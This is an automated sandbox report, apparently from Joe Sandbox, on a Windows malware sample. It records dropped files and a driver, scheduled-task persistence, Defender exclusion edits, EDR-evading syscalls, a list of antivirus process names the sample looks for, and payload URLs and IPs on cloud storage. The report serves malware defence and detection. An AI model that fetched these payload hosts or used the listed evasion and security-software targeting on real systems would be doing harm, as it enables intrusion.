Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,7_2_0000000140005A70
Source: 5oqa98.exe, 5oqa98.exe, 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: kxetray.exe
Source: 5oqa98.exe, 5oqa98.exe, 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: vsserv.exe
Source: 5oqa98.exe, 5oqa98.exe, 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avcenter.exe
Source: 5oqa98.exe, 5oqa98.exe, 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: KSafeTray.exe
Source: 5oqa98.exe, 5oqa98.exe, 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avp.exe
Source: 5oqa98.exe, 5oqa98.exe, 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360Safe.exe
Source: 5oqa98.exe, 5oqa98.exe, 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360tray.exe
Source: 5oqa98.exe, 5oqa98.exe, 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: rtvscan.exe
Source: 5oqa98.exe, 5oqa98.exe, 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: ashDisp.exe
Source: 5oqa98.exe, 5oqa98.exe, 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
Source: 5oqa98.exe, 5oqa98.exe, 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avgwdsvc.exe
Source: 5oqa98.exe, 5oqa98.exe, 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: AYAgent.aye
Source: 5oqa98.exe, 5oqa98.exe, 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: QUHLPSVC.EXE
Source: 5oqa98.exe, 5oqa98.exe, 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: RavMonD.exe
Source: 5oqa98.exe, 5oqa98.exe, 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
Source: 5oqa98.exe, 5oqa98.exe, 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: K7TSecurity.exe
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,7_2_00000001400042B0
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,7_2_0000000140003F80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Native API		1
DLL Side-Loading		1
Abuse Elevation Control Mechanism		1
Disable or Modify Tools		1
Credential API Hooking		1
System Time Discovery		Remote Services1
Archive Collected Data		2
Ingress Tool Transfer		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts11
Command and Scripting Interpreter		24
Windows Service		1
DLL Side-Loading		1
Abuse Elevation Control Mechanism		LSASS Memory3
File and Directory Discovery		Remote Desktop Protocol1
Credential API Hooking		11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Scheduled Task/Job		1
Scheduled Task/Job		1
Access Token Manipulation		2
Obfuscated Files or Information		Security Account Manager123
System Information Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts12
Service Execution		Login Hook24
Windows Service		1
DLL Side-Loading		NTDS141
Security Software Discovery		Distributed Component Object ModelInput Capture3
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
Process Injection		32
Masquerading		LSA Secrets1
Virtualization/Sandbox Evasion		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
Scheduled Task/Job		1
Modify Registry		Cached Domain Credentials2
Process Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Virtualization/Sandbox Evasion		DCSync1
Application Window Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Access Token Manipulation		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
Process Injection		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1584634 Sample: 2749837485743-7684385786.05.exe Startdate: 06/01/2025 Architecture: WINDOWS Score: 92 62 sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com 2->62 64 sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com 2->64 66 4 other IPs or domains 2->66 72 Malicious sample detected (through community Yara rule) 2->72 74 Sigma detected: Invoke-Obfuscation CLIP+ Launcher 2->74 76 AI detected suspicious sample 2->76 78 Sigma detected: Invoke-Obfuscation VAR+ Launcher 2->78 8 2749837485743-7684385786.05.exe 1 24 2->8         started        13 5oqa98.exe 20 2->13         started        15 5oqa98.exe 2->15         started        17 4 other processes 2->17 signatures3 process4 dnsIp5 68 sc-231t.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com 39.103.20.26, 443, 49974, 49975 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 8->68 54 C:\Windows\System32\drivers\189atohci.sys, PE32+ 8->54 dropped 56 C:\Users\user\Documents\vselog.dll, PE32+ 8->56 dropped 58 C:\Users\user\Documents\5oqa98.exe, PE32+ 8->58 dropped 86 Drops PE files to the document folder of the user 8->86 88 Sample is not signed and drops a device driver 8->88 90 Tries to detect virtualization through RDTSC time measurements 8->90 70 sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com 118.178.60.9, 443, 49981, 49982 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 13->70 60 C:\Program Files (x86)\naBa3A\naBa3A.exe, PE32 13->60 dropped 92 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 13->92 94 Found direct / indirect Syscall (likely to bypass EDR) 13->94 19 cmd.exe 1 13->19         started        22 cmd.exe 1 13->22         started        24 cmd.exe 1 13->24         started        26 cmd.exe 1 13->26         started        96 Uses cmd line tools excessively to alter registry or file data 17->96 28 reg.exe 1 1 17->28         started        30 reg.exe 1 1 17->30         started        32 reg.exe 1 1 17->32         started        34 5 other processes 17->34 file6 signatures7 process8 signatures9 80 Uses cmd line tools excessively to alter registry or file data 19->80 82 Uses schtasks.exe or at.exe to add and modify task schedules 19->82 36 conhost.exe 19->36         started        38 schtasks.exe 1 19->38         started        46 2 other processes 19->46 40 conhost.exe 22->40         started        48 3 other processes 22->48 42 conhost.exe 24->42         started        50 3 other processes 24->50 44 conhost.exe 26->44         started        52 3 other processes 26->52 84 Adds extensions / path to Windows Defender exclusion list (Registry) 28->84 process10

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
2749837485743-7684385786.05.exe3%VirustotalBrowse
2749837485743-7684385786.05.exe3%ReversingLabs

Dropped Files

SourceDetectionScannerLabelLink
C:\Program Files (x86)\naBa3A\naBa3A.exe0%ReversingLabs
C:\Users\user\Documents\5oqa98.exe0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://hu5wd1.oss-cn-beijing.aliyuncs.com/d.gif0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgF7e80%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/q0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgd/0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpgK0%Avira URL Cloudsafe
https://hu5wd1.oss-cn-beijing.aliyuncs.com/s.dat0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpghttps://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-510%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg:7y80%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/f.data0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg0%Avira URL Cloudsafe
https://hu5wd1.oss-cn-beijing.aliyuncs.com/c.gif0%Avira URL Cloudsafe
https://22mm.oss-cn-hang0%Avira URL Cloudsafe
https://hu5wd1.oss-cn-beijing.aliyuncs.com/b.gif0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg-0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/$0%Avira URL Cloudsafe
https://hu5wd1.oss-cn-beijing.aliyuncs.com/s.jpg0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/ngzhou.aliyuncs.com/17-2476756634-10030%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpgr:0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgJ7i80%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg4/0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpgHQx80%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgr7180%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/0%Avira URL Cloudsafe
https://hu5wd1.oss-cn-beijing.aliyuncs.com/i.dat0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/17-2476756634-10030%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg0%Avira URL Cloudsafe
https://hu5wd1.oss-cn-beijing.aliyuncs.com/a.gif0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgT/0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/f.dat0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com
118.178.60.9
truefalse
    		unknown
    sc-231t.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com
    		39.103.20.26
    		truefalse
      		unknown
      s-part-0017.t-0009.t-msedge.net
      		13.107.246.45
      		truefalse
        		high
        22mm.oss-cn-hangzhou.aliyuncs.com
        		unknown
        		unknownfalse
          		unknown
          hu5wd1.oss-cn-beijing.aliyuncs.com
          		unknown
          		unknownfalse
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://hu5wd1.oss-cn-beijing.aliyuncs.com/d.giffalse
            • Avira URL Cloud: safe
            		unknown
            https://hu5wd1.oss-cn-beijing.aliyuncs.com/s.datfalse
            • Avira URL Cloud: safe
            		unknown
            https://hu5wd1.oss-cn-beijing.aliyuncs.com/c.giffalse
            • Avira URL Cloud: safe
            		unknown
            https://hu5wd1.oss-cn-beijing.aliyuncs.com/s.jpgfalse
            • Avira URL Cloud: safe
            		unknown
            https://hu5wd1.oss-cn-beijing.aliyuncs.com/b.giffalse
            • Avira URL Cloud: safe
            		unknown
            https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpgfalse
            • Avira URL Cloud: safe
            		unknown
            https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgfalse
            • Avira URL Cloud: safe
            		unknown
            https://hu5wd1.oss-cn-beijing.aliyuncs.com/i.datfalse
            • Avira URL Cloud: safe
            		unknown
            https://hu5wd1.oss-cn-beijing.aliyuncs.com/a.giffalse
            • Avira URL Cloud: safe
            		unknown
            https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgfalse
            • Avira URL Cloud: safe
            		unknown
            https://22mm.oss-cn-hangzhou.aliyuncs.com/f.datfalse
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg:7y85oqa98.exe, 00000008.00000002.2574792265.0000000003DE3000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpghttps://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-515oqa98.exe, 00000008.00000002.2575032341.0000000003E6B000.00000004.00000020.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2571919128.000000000014B000.00000004.00000010.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2571919128.0000000000141000.00000004.00000010.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2571919128.000000000014E000.00000004.00000010.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2571919128.0000000000146000.00000004.00000010.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg5oqa98.exe, 00000008.00000002.2575032341.0000000003E6B000.00000004.00000020.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2571919128.000000000014B000.00000004.00000010.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2571919128.0000000000141000.00000004.00000010.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2571919128.000000000014E000.00000004.00000010.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2571919128.0000000000146000.00000004.00000010.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpgK5oqa98.exe, 00000008.00000002.2572103669.00000000005BD000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgF7e85oqa98.exe, 00000008.00000002.2574792265.0000000003DE3000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://ocsp.thawte.com0189atohci.sys.0.dr, 5oqa98.exe.0.drfalse
              		high
              https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgd/5oqa98.exe, 00000008.00000002.2574792265.0000000003DE3000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://22mm.oss-cn-hangzhou.aliyuncs.com/q5oqa98.exe, 00000008.00000002.2572341203.000000000062F000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://22mm.oss-cn-hangzhou.aliyuncs.com/f.data5oqa98.exe, 00000008.00000002.2572103669.00000000005BD000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://22mm.oss-cn-hang5oqa98.exe, 00000008.00000002.2572103669.00000000005BD000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.symauth.com/cps0(5oqa98.exe.0.drfalse
                		high
                https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgJ7i85oqa98.exe, 00000008.00000002.2574792265.0000000003DE3000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg4/5oqa98.exe, 00000008.00000002.2574792265.0000000003DE3000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://22mm.oss-cn-hangzhou.aliyuncs.com/$5oqa98.exe, 00000008.00000002.2572103669.00000000005BD000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpgr:5oqa98.exe, 00000008.00000002.2571919128.000000000014E000.00000004.00000010.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://22mm.oss-cn-hangzhou.aliyuncs.com/ngzhou.aliyuncs.com/17-2476756634-10035oqa98.exe, 00000008.00000002.2572103669.00000000005FF000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg-5oqa98.exe, 00000008.00000002.2572103669.00000000005BD000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://crl.thawte.com/ThawteTimestampingCA.crl0189atohci.sys.0.dr, 5oqa98.exe.0.drfalse
                  		high
                  https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpgHQx85oqa98.exe, 00000008.00000002.2572103669.0000000000570000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.symauth.com/rpa005oqa98.exe.0.drfalse
                    		high
                    https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg5oqa98.exe, 00000008.00000002.2575032341.0000000003E6B000.00000004.00000020.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2571919128.000000000014B000.00000004.00000010.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2571919128.0000000000141000.00000004.00000010.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2571919128.000000000014E000.00000004.00000010.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2571919128.0000000000146000.00000004.00000010.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgr7185oqa98.exe, 00000008.00000002.2574792265.0000000003DE3000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://22mm.oss-cn-hangzhou.aliyuncs.com/5oqa98.exe, 00000008.00000002.2572103669.00000000005FF000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://22mm.oss-cn-hangzhou.aliyuncs.com/17-2476756634-10035oqa98.exe, 00000008.00000002.2572103669.00000000005FF000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgT/5oqa98.exe, 00000008.00000002.2574792265.0000000003DE3000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    118.178.60.9
                    		sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.comChina
                    		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                    39.103.20.26
                    		sc-231t.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.comChina
                    		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1584634
                    Start date and time:2025-01-06 04:41:12 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 7m 9s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:42
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:2749837485743-7684385786.05.exe
                    Detection:MAL
                    Classification:mal92.evad.winEXE@55/18@2/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    03:43:47Task SchedulerRun new task: yeSle path: C:\Users\user\Documents\5oqa98.exe
                    22:42:06API Interceptor941x Sleep call for process: 2749837485743-7684385786.05.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    118.178.60.92b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                      45631.exeGet hashmaliciousNitolBrowse
                        0000000000000000.exeGet hashmaliciousNitolBrowse
                          T1#U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousNitolBrowse

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            s-part-0017.t-0009.t-msedge.netInsomia.exeGet hashmaliciousLummaCBrowse
                            • 13.107.246.45
                            setup64v6.4.5.msiGet hashmaliciousUnknownBrowse
                            • 13.107.246.45
                            3LcZO15oTC.exeGet hashmaliciousUnknownBrowse
                            • 13.107.246.45
                            3LcZO15oTC.exeGet hashmaliciousUnknownBrowse
                            • 13.107.246.45
                            Tax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
                            • 13.107.246.45
                            4XYAW8PbZH.exeGet hashmaliciousRemcosBrowse
                            • 13.107.246.45
                            GpuXmm386e.msiGet hashmaliciousUnknownBrowse
                            • 13.107.246.45
                            yKkpG6xM4S.msiGet hashmaliciousUnknownBrowse
                            • 13.107.246.45
                            IlPF8gbvGl.msiGet hashmaliciousUnknownBrowse
                            • 13.107.246.45
                            iGhDjzEiDU.exeGet hashmaliciousRemcosBrowse
                            • 13.107.246.45
                            sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                            • 118.178.60.9
                            45631.exeGet hashmaliciousNitolBrowse
                            • 118.178.60.9
                            0000000000000000.exeGet hashmaliciousNitolBrowse
                            • 118.178.60.9
                            T1#U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousNitolBrowse
                            • 118.178.60.9

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdcZO.exeGet hashmaliciousUnknownBrowse
                            • 120.77.100.135
                            z0r0.m68k.elfGet hashmaliciousMiraiBrowse
                            • 8.133.115.153
                            2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                            • 39.103.20.34
                            2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                            • 39.103.20.34
                            N5kEzgUBn6.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                            • 101.201.227.94
                            N5kEzgUBn6.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                            • 101.201.227.94
                            3.elfGet hashmaliciousUnknownBrowse
                            • 8.189.180.251
                            3.elfGet hashmaliciousUnknownBrowse
                            • 8.138.48.163
                            armv6l.elfGet hashmaliciousUnknownBrowse
                            • 223.4.27.34
                            armv5l.elfGet hashmaliciousUnknownBrowse
                            • 8.130.140.184
                            CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdcZO.exeGet hashmaliciousUnknownBrowse
                            • 120.77.100.135
                            z0r0.m68k.elfGet hashmaliciousMiraiBrowse
                            • 8.133.115.153
                            2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                            • 39.103.20.34
                            2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                            • 39.103.20.34
                            N5kEzgUBn6.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                            • 101.201.227.94
                            N5kEzgUBn6.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                            • 101.201.227.94
                            3.elfGet hashmaliciousUnknownBrowse
                            • 8.189.180.251
                            3.elfGet hashmaliciousUnknownBrowse
                            • 8.138.48.163
                            armv6l.elfGet hashmaliciousUnknownBrowse
                            • 223.4.27.34
                            armv5l.elfGet hashmaliciousUnknownBrowse
                            • 8.130.140.184

                            JA3 Fingerprints

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            37f463bf4616ecd445d4a1937da06e19drop1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                            • 39.103.20.26
                            • 118.178.60.9
                            ZT0KQ1PC.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                            • 39.103.20.26
                            • 118.178.60.9
                            LinxOptimizer.exeGet hashmaliciousUnknownBrowse
                            • 39.103.20.26
                            • 118.178.60.9
                            setup.msiGet hashmaliciousUnknownBrowse
                            • 39.103.20.26
                            • 118.178.60.9
                            drop1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                            • 39.103.20.26
                            • 118.178.60.9
                            2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                            • 39.103.20.26
                            • 118.178.60.9
                            2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                            • 39.103.20.26
                            • 118.178.60.9
                            K27Yg4V48M.exeGet hashmaliciousLummaCBrowse
                            • 39.103.20.26
                            • 118.178.60.9
                            IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                            • 39.103.20.26
                            • 118.178.60.9
                            Tax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
                            • 39.103.20.26
                            • 118.178.60.9

                            Dropped Files

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            C:\Users\user\Documents\5oqa98.exe2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                              2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                                45631.exeGet hashmaliciousNitolBrowse
                                  45631.exeGet hashmaliciousUnknownBrowse
                                    0000000000000000.exeGet hashmaliciousNitolBrowse
                                      0000000000000000.exeGet hashmaliciousUnknownBrowse
                                        T1#U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousNitolBrowse
                                          C:\Program Files (x86)\naBa3A\naBa3A.exe2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                                            45631.exeGet hashmaliciousNitolBrowse
